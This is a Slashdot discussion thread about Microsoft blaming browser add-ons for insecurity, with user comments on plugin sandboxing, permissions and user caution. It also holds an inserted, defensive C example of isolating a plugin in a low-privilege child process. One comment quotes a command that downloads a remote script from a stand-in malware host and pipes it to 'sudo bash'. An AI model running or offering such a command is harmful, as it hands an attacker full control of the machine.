Slashdot: News for Nerds

Microsoft Blames Add-Ons For Browser Woes

timothy posted more than 5 years ago | from the sounds-semi-reasonable dept.

Internet Explorer 307

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

307 comments

Duh (5, Insightful)

Drinking Bleach (975757) | more than 5 years ago | (#25850749)

Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

!news

I'll still blame you for everything else. (5, Insightful)

retech (1228598) | more than 5 years ago | (#25850759)

Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've missed some.

Re:I'll still blame you for everything else. (5, Informative)

stewbacca (1033764) | more than 5 years ago | (#25850915)

You forgot the "embedded video frequently doesn't play even though it's a Microsoft codec" bit.

Re:I'll still blame you for everything else. (5, Funny)

gmack (197796) | more than 5 years ago | (#25851555)

That would be an add-on problem.

Re:I'll still blame you for everything else. (3, Interesting)

xonar (1069832) | more than 5 years ago | (#25851767)

A microsoft addon, divx anyone?

Re:I'll still blame you for everything else. (2, Insightful)

Kamokazi (1080091) | more than 5 years ago | (#25851937)

To be fair to Microsoft (And a disclaimer, I primarily use Opera myself):

-I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot.

-IE7 is definitely a standard-ignoring bastard. And assuming you're an FF advocate, remember it didn't pass Acid2 until FF3. And IE8 is shipping in a standard-compliant mode by default, which should help all browsers out.

-Sluggish...compared to FF3 and Opera. But it was faster than FF2 for several different languages...so then FF2 was also sluggish, by your standards.

-Bloated? How? I really don't see any bloat compared to other browsers.

-What features do you expect from it out of the box? Seems to do about the same as the others, plus or minus some minor stuff.

(Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

Re:I'll still blame you for everything else. (1)

mal3 (59208) | more than 5 years ago | (#25852019)

Just replying to undo accidental troll moderation

Permissions (5, Insightful)

gurps_npc (621217) | more than 5 years ago | (#25850773)

And if the add-ons were given far more permission than they actually need? If the browser works right, then the damage a poorly written add-on can do should be minimal.

Re:Permissions (4, Interesting)

TheRaven64 (641858) | more than 5 years ago | (#25850861)

Ideally, most of these plugins should be setuid as nobody, run in a separate process and have their windows reparented into the browser window. I don't know of any *NIX systems that actually do this for plugins. I believe Chrome does something similar on Windows, but IE does not (although it runs the entire browser as a less-privileged process on Vista).
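A minimal POSIX sketch of the design described in the comment above, added here as an example and not taken from any browser: the plugin runs in a forked child with CPU and core-dump limits, optionally drops to nobody, and hands its output back over a pipe, so a crash only costs the child. The `plugin_fn` interface, `run_isolated` and both sample plugins are hypothetical.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical plugin interface: render `input` into `out`, 0 on success. */
typedef int (*plugin_fn)(const char *input, char *out, size_t outlen);

/* Constructed sample plugins: one well behaved, one that crashes. */
int plugin_ok(const char *input, char *out, size_t outlen)
{
    snprintf(out, outlen, "rendered:%s", input);
    return 0;
}

int plugin_crash(const char *input, char *out, size_t outlen)
{
    (void)input; (void)out; (void)outlen;
    abort();
}

/* Become "nobody" for good. Supplementary groups go first, then gid, then
 * uid: once the uid is gone the process can no longer change the others. */
static int become_nobody(void)
{
    struct passwd *pw = getpwnam("nobody");
    if (pw == NULL || setgroups(0, NULL) != 0 ||
        setgid(pw->pw_gid) != 0 || setuid(pw->pw_uid) != 0)
        return -1;
    return setuid(0) == 0 ? -1 : 0;      /* regaining root must fail */
}

/* Run `plugin` in its own process. Returns 0 with the output in `out`, or -1
 * if the plugin crashed, failed or could not be confined. `as_nobody` needs
 * a root caller; pass 0 to get process isolation only. */
int run_isolated(plugin_fn plugin, const char *input,
                 char *out, size_t outlen, int as_nobody)
{
    int fds[2], status;
    size_t used = 0;
    ssize_t n;

    if (outlen == 0 || pipe(fds) != 0)
        return -1;
    out[0] = '\0';
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                      /* child: the plugin host */
        char buf[256] = "";
        struct rlimit cpu = { 2, 2 }, core = { 0, 0 };
        close(fds[0]);
        setrlimit(RLIMIT_CPU, &cpu);     /* a spinning plugin gets killed */
        setrlimit(RLIMIT_CORE, &core);
        if (as_nobody && become_nobody() != 0)
            _exit(126);                  /* fail closed: never run unconfined */
        if (plugin(input, buf, sizeof buf) != 0)
            _exit(1);
        buf[sizeof buf - 1] = '\0';
        size_t len = strlen(buf);
        _exit(write(fds[1], buf, len) == (ssize_t)len ? 0 : 1);
    }
    close(fds[1]);                       /* parent: the browser */
    while (used < outlen - 1 &&
           (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        out[0] = '\0';                   /* discard output of a dead plugin */
        return -1;
    }
    return 0;
}

int main(void)
{
    char out[64];
    int rc = run_isolated(plugin_ok, "movie.swf", out, sizeof out, 0);
    printf("ok plugin:    rc=%d out=%s\n", rc, out);
    rc = run_isolated(plugin_crash, "movie.swf", out, sizeof out, 0);
    printf("crash plugin: rc=%d, host still running\n", rc);
    return 0;
}
```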

Re:Permissions (5, Informative)

Anonymous Coward | more than 5 years ago | (#25851129)

Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.

Re:Permissions (2, Informative)

ShawnCplus (1083617) | more than 5 years ago | (#25851389)

That's gotta be new. Every time I've gotten within 100 yards of a site with flash Konqueror crashed.

What about kde-gnash? (4, Informative)

mangu (126918) | more than 5 years ago | (#25851747)

There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was.

You are right that konqueror does not crash the whole computer, but that's still very far from the desired result.

Re:Permissions (1)

PopeRatzo (965947) | more than 5 years ago | (#25851801)

Konqueror runs flash elements and java applets

Except when it doesn't.

Re:Permissions (5, Insightful)

geirnord (150896) | more than 5 years ago | (#25850863)

I second that! Somewhere along the line add-ons got way too many permissions. Why on earth does Adobe Flash have access to my webcam and hard drive?!?

Re:Permissions (2, Informative)

soniCron88 (870042) | more than 5 years ago | (#25850989)

Somewhere along the line add-ons got way too many permissions. Why on earth does Adobe Flash have access to my webcam and hard drive?!?

Was there a time when plug-ins couldn't have access to the harddrive?

Re:Permissions (4, Interesting)

ya really (1257084) | more than 5 years ago | (#25851259)

IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. I'm not an MS fanboy, but can they really be blamed for shoddy coding done by third parties?

Re:Permissions (4, Interesting)

gurps_npc (621217) | more than 5 years ago | (#25851567)

Because they made it easy to write shoddy code. If you make people go through hoops to get the good stuff, then they get lazy and accept the minimum. To use a real world analogy, no, you don't need to have the same key start the car as open your front door, your mail box, and your office. If you insist on selling a car, house lock, mailbox and the office, then don't also make them use the same key for 'convenience'.

Re:Permissions (4, Interesting)

catchblue22 (1004569) | more than 5 years ago | (#25851837)

IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. I'm not an MS fanboy, but can they really be blamed for shoddy coding done by third parties?

Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since Vista bugs users for permission so much, most users would just click through the warning thoughtlessly.

I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious.

Re:Permissions (1)

aztektum (170569) | more than 5 years ago | (#25851917)

If Microsoft puts out an OS which allows people to write third party software for it, don't they have some obligation to make sure their OS can't be compromised by third parties?

Re:Permissions (1)

catchblue22 (1004569) | more than 5 years ago | (#25851649)

Microsoft creates the environment in which these add-ons run. If that environment is too permissive, allowing add-ons to reach deep into your system, then this is still Microsoft's fault. They should only allow the add-ons to play in a very small sandbox with high walls.

Re:Permissions (1)

orclevegam (940336) | more than 5 years ago | (#25852057)

Of course, the most massively abused addon ever is ActiveX. Also, when the "addon" ships with the browser, you shouldn't really be able to call it an addon anymore.

Firefox has the right idea with extensions, they're relatively small, lightweight, incredibly flexible, but also easy to corral and sandbox. Since most things you want to do can be handled by extensions, there's really very little reason to use plugins in Firefox outside of things like flash, pdf, or embedding mplayer/vlc/media player of choice. Over on the IE side of things however, anything you want to change must be done via a plugin, which means running a binary blob and having to trust it not to do something nasty.

I've always said this. (4, Insightful)

bigstrat2003 (1058574) | more than 5 years ago | (#25850775)

The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

Re:I've always said this. (3, Informative)

Anonymous Coward | more than 5 years ago | (#25850847)

And if your browser isn't full of security holes, it doesn't matter which sites you go to.

I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses.

Re:I've always said this. (2, Insightful)

SQLGuru (980662) | more than 5 years ago | (#25850981)

How about a car analogy?

If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.

Layne

Re:I've always said this. (0, Offtopic)

morgan_greywolf (835522) | more than 5 years ago | (#25851363)

Until the thugs from Liberty City show up in your hometown's Main Street and then you get jacked by total surprise.

Re:I've always said this. (4, Informative)

bigstrat2003 (1058574) | more than 5 years ago | (#25851461)

This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy.

Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners.

Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with.

And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training.

This is too fun (5, Funny)

Anonymous Coward | more than 5 years ago | (#25851695)

I like the sex analogies; I think this should be a new standard for /.

Yours has some good points but:

Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.

Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?

Re:I've always said this. (1)

blueskies (525815) | more than 5 years ago | (#25851721)

Except that large numbers of people don't go around stealth-infecting people on purpose to infect others.

With automated botnets scanning and attacking, your legitimate sites are getting exploited: Large scale SQL insertion attack [computerworld.com].

You could use something like siteadvisor.com [siteadvisor.com] to help protect yourself, if you aren't afraid of using something owned by McAfee. It doesn't catch exploited sites instantaneously, but it helps you on the user training front by marking a large swath of the internet as unsafe. It definitely catches a LOT of nasty sites that your grandmother might accidentally click on.

Re:I've always said this. (1)

hyades1 (1149581) | more than 5 years ago | (#25851133)

I agree completely. My antivirus program says everything is fine, and so does my spyware killer. The only thing I can't quite figure out is that since I started on-line banking, it doesn't matter how much money I put in my account, the balance won't go above $5,000. :)

Re:I've always said this. (1)

DoofusOfDeath (636671) | more than 5 years ago | (#25851241)

... and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

How do you know?

Re:I've always said this. (1)

VeNoM0619 (1058216) | more than 5 years ago | (#25851285)

Because after he got his virus, he became afraid of the internet and didn't visit any sites up until Chrome's recent release.

Welcome to the internet, I'll show you around.

Re:I've always said this. (1)

bigstrat2003 (1058574) | more than 5 years ago | (#25851479)

Because I monitor my computer's behavior and health? I'm not a babe-in-the-woods clueless user, here, I keep an eye on how my PC is doing. It's technically possible that I could have got some sort of invisible, undetectable malware, but if we take it to that level of ridiculosity, then no one knows if their computer is clean.

Re:I've always said this. (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25851657)

no one knows if their computer is clean

BINGO, motherfucker.

Re:I've always said this. (0)

Anonymous Coward | more than 5 years ago | (#25851715)

....I'm not a babe-in-the-woods clueless user, here....

Hmm, your original post said:

I used IE from the day I started using the internet until the day Chrome was released

Yeah, not clueless. Not clueless at all.

Re:I've always said this. (0)

Anonymous Coward | more than 5 years ago | (#25851353)

So you joined the intertube forums just so you to try the new chrome pipes?

Re:I've always said this. (5, Insightful)

Sloppy (14984) | more than 5 years ago | (#25851393)

The biggest part of internet security is paying attention to where you go.

I would agree with you, if "going" to a malware site meant

curl ftp://malwaresite.com/malware.sh | sudo bash

Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

"Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

Re:I've always said this. (2, Insightful)

joeflies (529536) | more than 5 years ago | (#25851423)

I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent someone from taking over your machine.

You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting mugged. But that doesn't make you mugging-proof.

Re:I've always said this. (1)

bigstrat2003 (1058574) | more than 5 years ago | (#25851505)

I agree, but I did say that the technical side of the issue shouldn't be ignored. Both are important.

Re:I've always said this. (1)

Smauler (915644) | more than 5 years ago | (#25851641)

Meh - I go to all kinds of dodgy sites, and have yet to have a virus. Obviously I get a few warnings, Firefox warns me about some stuff, and I never ever actually run anything from a source I don't trust. My personal opinion is that most people get viruses from emails their friends have sent them, which they click yes to. Vista's UAC is actually pretty useful for me. It rarely pops up when I'm doing normal stuff, and it does stop stuff from running as admin. I used to have antivirus on this box, but I got rid of it because I cannot see how I personally will get a virus in the first place.

Back on topic - I think the major security problem of our time for the general populace is malware misrepresenting itself. Social engineering has always been the best way into any system, if you can get the user to run a program, you don't need to bypass any tough defences. All it takes for a lot of people is a pop-up window saying "Your PC is infected, click here to clean it".

Re:I've always said this. (1)

techno-vampire (666512) | more than 5 years ago | (#25851647)

if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

All men have two heads, but they can only think with one of them at a time. Now, if you're indulging in some "one-handed browsing," how secure your browser is may well be a factor in keeping your computer clean because sites like that are prime grazing ground for malware and trojans and spyware, Oh my!

But remember (5, Insightful)

dedazo (737510) | more than 5 years ago | (#25850789)

If it's Firefox, it's perfectly OK to blame the add-ons.

Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

Re:But remember (0)

Anonymous Coward | more than 5 years ago | (#25850949)

Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

Fixed? Really? Somehow, I doubt [imageshack.us] that they have fixed a whole lot...

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851113)

Wow, that's really bad.

I have seen some decrease in the amount of memory used by 3.x over 2.x, especially when I leave the browser open for days at a time.

On the other hand, 3 does seem to crash more often, at least on me. This [letmegoogl...foryou.com] page will make it crash every single time on this machine, for example.

Re:But remember (1)

Daimanta (1140543) | more than 5 years ago | (#25851189)

"This [letmegoogl...foryou.com] page will make it crash every single time on this machine, for example."

Using 3.1b1 and nothing strange happens. Add-ons: Adblock plus, Noscript(off), fasterfox

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851311)

3.0.4 on Vista here. A bunch of add-ons like AdBlock Plus, Flashblock, Google Toolbar, etc. I didn't try disabling them. I should mention that it works fine on an XP Pro laptop I have sitting here on my desk with 2.x (I forget the exact version), so it might be something about this install. Java is also broken for some reason. Maybe it was the upgrade, instead of just starting from scratch.

Re:But remember (1)

nneonneo (911150) | more than 5 years ago | (#25852055)

3.0.4 on XP, 30+ tabs open (including GMail), 284MB used. I've about a dozen add-ons, including NoScript (currently permitting almost all the open sites), ABP, Firebug, YSlow, Greasemonkey, ...
 
I restart Firefox about as often as I restart XP, which is not very often.

Re:But remember (1)

clone53421 (1310749) | more than 5 years ago | (#25851199)

It didn't crash, and I'm definitely keeping that link! :)

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851263)

Yeah, it's pretty funny. It was doing the rounds the other day.

Works fine on IE as well, which is what I had to use to look at it.

Re:But remember (0)

Anonymous Coward | more than 5 years ago | (#25851281)

Yah, that was exactly what I thought when I snapped that screenshot.

FF 3.0.3 with 4 tabs (Slashdot, Gmail, Mozilla forum, and about:cache) running on a Vista Ultimate x64 box taking 1.5GB of RAM. Yah.

I'm not even going to get started with the widespread problem firefox users report with Youtube videos randomly not playing until you restart the browser. Default reply from the FF folks? "Try running it in safe mode". Seriously.

I went back to IE, which *never* gets anywhere near 1/2 the memory usage of FF3. True, I can't use the Download Statusbar nor Google Redesigned extensions, but I can live without the statusbar and Gmail now has themes.
Everything else just *works*.

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851487)

I wouldn't go back to IE though, not unless there's equivalents to AdBlock, FlashBlock, Google Notebook and CustomizeGoogle that work within the browser and work well. And themes, at least the one I use in Firefox.

Whatever failings FF has, it's still an acceptable trade-off over Internet Explorer as far as I'm concerned.

Re:But remember (1)

PitaBred (632671) | more than 5 years ago | (#25851495)

3.0.4 here, Adblock Plus, Foxmarks, FoxyProxy and User Agent Switcher plugins, and that site works fine. You have something screwed up on your machine.

Car analogy (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#25850797)

If you get late to work...
it's because you woke up late, you lazy a**.
STOP BLAMING THE TRAFFIC!

It's the Network! (1)

qwertphobia (825473) | more than 5 years ago | (#25850857)

Around here, and many other places, I suspect, the generally-accepted practice is to first blame the network when problems arise.

The network usually isn't at fault but we are still forced to jump through hoops before we can tell the user the network is fine, it's their poorly-implemented config/script/filter that caused their problems.

I see this as a similar practice... if some crap comes through the browser, it must be the browser's fault. Never mind that some toolbar or plugin or other enhancement left a few doors open.

Re:It's the Network! (1)

QuantumRiff (120817) | more than 5 years ago | (#25851063)

Love it when users try to blame their flaky network connections for files getting deleted. They certainly didn't delete the wrong file, their network connection is glitchy and "goes down" all the time, they tell me on their IP phone....

Re:It's the Network! (1)

gbjbaanb (229885) | more than 5 years ago | (#25851723)

I thought the generally accepted practice for MS is to first blame the video driver, and then blame the printer driver. *then* they might look at the problem :)

Mind you, I agree with MS here, the biggest problem with the browser is the add-ins.. ones like SmileyCentral, AdsULike, PhishingToolbar, AntiVirusCheckPro, and NoSpamHonestNoReally.

Add on architecture? (3, Insightful)

tjstork (137384) | more than 5 years ago | (#25850875)

Microsoft made add-ons essentially super-user in the browser space, and now they complain about add-ons being ill-behaved? If you don't want kids to bang their heads on your playground, perhaps design it better?

Re:Add on architecture? (1)

geirnord (150896) | more than 5 years ago | (#25850927)

Flamebait, if it weren't true....

Bullshit. Plain utter bullshit. (4, Insightful)

syousef (465911) | more than 5 years ago | (#25850899)

Many non-power-users don't use addons at all.

If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

Re:Bullshit. Plain utter bullshit. (4, Insightful)

EvanED (569694) | more than 5 years ago | (#25850975)

Many non-power-users don't use addons at all.

And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

Re:Bullshit. Plain utter bullshit. (2, Informative)

nschubach (922175) | more than 5 years ago | (#25851315)

Yes, I'm still trying to figure out how to teach my Mom that she doesn't need EVERY toolbar in existence.

Re:Bullshit. Plain utter bullshit. (0)

Anonymous Coward | more than 5 years ago | (#25851901)

Gawd I hate those, I couldn't even figure out how to get Yahoo's to uninstall (back when I did use IE). That was the first thing that brought me to mozilla was the absence of that dang yahoo toolbar.

Re:Bullshit. Plain utter bullshit. (4, Insightful)

athakur999 (44340) | more than 5 years ago | (#25851019)

Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

Re:Bullshit. Plain utter bullshit. (1)

goofballs (585077) | more than 5 years ago | (#25851025)

yeah, bullshit is right- bullshit power users don't use add-ons; look at the examples given in the article and the summary- flash, pdf, and quicktime? unless you categorize all the youtube users as 'techies', eh?

Re:Bullshit. Plain utter bullshit. (1)

Drinking Bleach (975757) | more than 5 years ago | (#25851045)

I'm going to remember that next time I have to fix someone's computer and IE has 10 bullshit toolbars, of which 9 of them are malware.

Re:Bullshit. Plain utter bullshit. (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25851065)

Not knowingly you mean. Most users who don't know much about computers I find have at least 5 different toolbars from various software vendors including but not limited to yahoo, google and adobe. It seems that every fucking program nowadays has some stupid browser toolbar/addon shit tacked onto it you need to tell the installer to NOT FUCKING INSTALL or it will take over your browser.

Re:Bullshit. Plain utter bullshit. (1)

mcgrew (92797) | more than 5 years ago | (#25851101)

From TFA: The browser is becoming a harder target and there are many more browsers," Lawrence said. "So attackers are targeting add-onsaling from the poor to give to the rich.

But your IE add-on won't work in Firefox and the Firefox add-on won't work on Opera. How stupid do these people think we are?

He added that attackers are finding add-ons with high market share looking for vulnerabilities and then exploiting every browser through the add-on

Again, that's neither logical nor reasonable. Can anyone point to an add-on that has more users than ANY brand of browser? How many millions of copies of IE were shipped last month?

you could still be at risk if there is a vulnerability in Flask, PDF, QuickTime or another popular add-on

I think they meant "flash", my home browser has no need for PDF, I gave up quicktime years ago (ugh) and the only thing Flash does is try and serve ads. So is this chump saying I can forget about vulnerabilities and just use IE?

Seems to me most of the vulnerabilities I hear about involve Active-X, which is only supported by IE. maybe that's the "addon" he's talking about ;)

Re:Bullshit. Plain utter bullshit. (2, Interesting)

TheRaven64 (641858) | more than 5 years ago | (#25851235)

Can anyone point to an add-on that has more users than ANY brand of browser?

Sun Java? Adobe Flash? Not sure about the former, but the latter has a much bigger installed-base than IE.

Re:Bullshit. Plain utter bullshit. (2, Informative)

Jamie's Nightmare (1410247) | more than 5 years ago | (#25851293)

Many non-power-users don't use addons at all.

That's incorrect. Most of them install the add-ons without really knowing what they are doing, or don't uncheck the box that says "Install this tool bar you don't want" when installing software.

Re:Bullshit. Plain utter bullshit. (1)

Simon (S2) (600188) | more than 5 years ago | (#25851309)

Many non-power-users don't use addons at all.

Everybody (well, almost of course) has flash installed nowadays.

Re:Bullshit. Plain utter bullshit. (1)

wizkid (13692) | more than 5 years ago | (#25851331)

I'm a power user, and I use add-ons ... Especially noscript. It's really helpful on IE... No wait ... Nevermind on the IE part. I haven't used wine to load IE yet.

Re:Bullshit. Plain utter bullshit. (0)

Anonymous Coward | more than 5 years ago | (#25851445)

A power user who uses IE .. ?! Please, tell me you are joking!

Re:Bullshit. Plain utter bullshit. (1)

clone53421 (1310749) | more than 5 years ago | (#25851671)

Did you miss the part where he said he hadn't loaded IE?

NoScript is a Firefox addon...

Re:Bullshit. Plain utter bullshit. (2, Informative)

clodney (778910) | more than 5 years ago | (#25851357)

I think the article was not referring to addons in the sense that a geek thinks of them - adblock, firebug, noscript, etc.

Instead, they mean the biggies - acrobat, flash, quicktime. Most systems will have some or all of those installed.

Re:Bullshit. Plain utter bullshit. (2, Interesting)

Fujisawa Sensei (207127) | more than 5 years ago | (#25851735)

Many non-power-users don't use addons at all.

If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

Many power-users install only a minimal number of addons to do what we want. Stuff like flash-block along with flash. We don't need a dozen fool-bars or huge numbers of widgets.

Re:Bullshit. Plain utter bullshit. (1)

cpicon92 (1157705) | more than 5 years ago | (#25851963)

Adobe PDF Reader comes prepackaged with new Dells. I know many a non-techie who had like 18 different toolbars installed too.

Tied down! (2, Insightful)

Anonymous Coward | more than 5 years ago | (#25850955)

Its browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow!

I think they have a point.. (4, Funny)

Anonymous Coward | more than 5 years ago | (#25850985)

With the likes of ActiveX, and Silverlight out there, who could blame IE?

Re:I think they have a point.. (3, Insightful)

Ethanol-fueled (1125189) | more than 5 years ago | (#25851167)

Finally!

28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.

Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

Re:I think they have a point.. (2, Insightful)

bigstrat2003 (1058574) | more than 5 years ago | (#25851717)

Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever.

What A Coincidence! (0, Offtopic)

Wandering Wombat (531833) | more than 5 years ago | (#25851041)

I aren't go after the browser, neither! I can has cheezburger nao?

excuses (1, Insightful)

danielt998 (1348307) | more than 5 years ago | (#25851049)

Microsoft are just looking for any excuse to hide the fact that IE is really insecure and crap.

Speaking of add-ons (5, Insightful)

Anonymous Coward | more than 5 years ago | (#25851057)

Would an example of this include the Active X Control you have to install to be able to run Windows Update?

Plugin model (4, Insightful)

Enderandrew (866215) | more than 5 years ago | (#25851197)

Aren't they responsible for the plugin model in their browser? Aren't they responsible for the OS security?

Take a look at how Chrome handles plugins and then try to pass the buck.

Re:Plugin model (3, Informative)

benjymouse (756774) | more than 5 years ago | (#25851959)

Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on an intrinsic level protects against modifications to the file system, registry, network access etc.

Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities.

If a plugin needs more advanced access than what is provided by this broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability) which enabled a security researcher to execute a program on the Vista machine in the pwn2own contest.

Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adamant that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rouge process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs.

Re:Plugin model (0)

Anonymous Coward | more than 5 years ago | (#25852033)

That does not provide more security against a rouge process taking over the machine

I don't know about rouge, but I used to see bleu all the time.

"Mashups" are the biggest problem (0)

Anonymous Coward | more than 5 years ago | (#25851219)

It doesn't matter that you only visit known websites with plugins enabled. These days almost all websites embed content from other servers, in the form of ads, widgets and toolkit scripts. Computer security is ever more resembling biological immune systems instead of the old-fashioned "absolute" security approach. Software isn't written to be secure, systems aren't designed to be correct. It's as if we've accepted that a certain level of infection is unavoidable. That's a dangerous game when pieces of data as little as 16 bytes can totally compromise a system.

Yeah... that's the ticket (1)

Toe, The (545098) | more than 5 years ago | (#25851253)

(Sorry... can't find the video; SNL's crackin' down, I guess. All I got is some transcript [jt.org].)

But Windows is a security hole platform! (1)

David Gerard (12369) | more than 5 years ago | (#25851391)

After what was expected to be an unusually quiet Patch Tuesday, Microsoft has released eight patches for applications with an insufficient number of security holes [today.com].

The updates include "critical" patches to Windows Media Player visualisations, Zune player software, that really cute dinosaur cursor and Age Of Empires II. The exploits opened by these patches allow a malicious user to take webcam pictures of your pimply butt, steal your pizza delivery and have sex with your girlfriend. The exploits have already been marketed to the Dark Security market by Microsoft Russia.

"Windows 7 won't be vulnerable!" added marketing marketer Jonathan Ness. "Did we mention how fantastic Windows 7 will be? Also, Vista's pretty good! Really! The London Stock Exchange was probably still on XP!"

Safari 3.2 blames everything but itself (0)

Anonymous Coward | more than 5 years ago | (#25851439)

ActiveX finally on the chopping block? (1)

McNihil (612243) | more than 5 years ago | (#25851509)

Well one can always hope they kill off ActiveX now that everything is "primed" for silverlight... *coug* *cough* ... old tech meet the new tech... at the end of the day same ole same ole.

What better way to get massive adoption of new stuff?

What is needed is better warning messages (1, Interesting)

Anonymous Coward | more than 5 years ago | (#25851573)

I see people trying to install the free "Spyware Removal" and "Registry Scanner" all the time on our Citrix servers. They fail, of course, but it doesn't stop them from trying. And what warning does the OS give you when a site is trying to install something?
A yellow bar that suggests you click here to proceed. It might mention that some content may be harmful.

It should say something like: "This web site is trying to crap on your computer. If you enjoy getting crapped on and ripped off in your personal life, click here to proceed." If they do click, then it should say: "People like you are why syphilis is still a common disease".

No way! (0)

Anonymous Coward | more than 5 years ago | (#25851655)

Add-ons for IE??

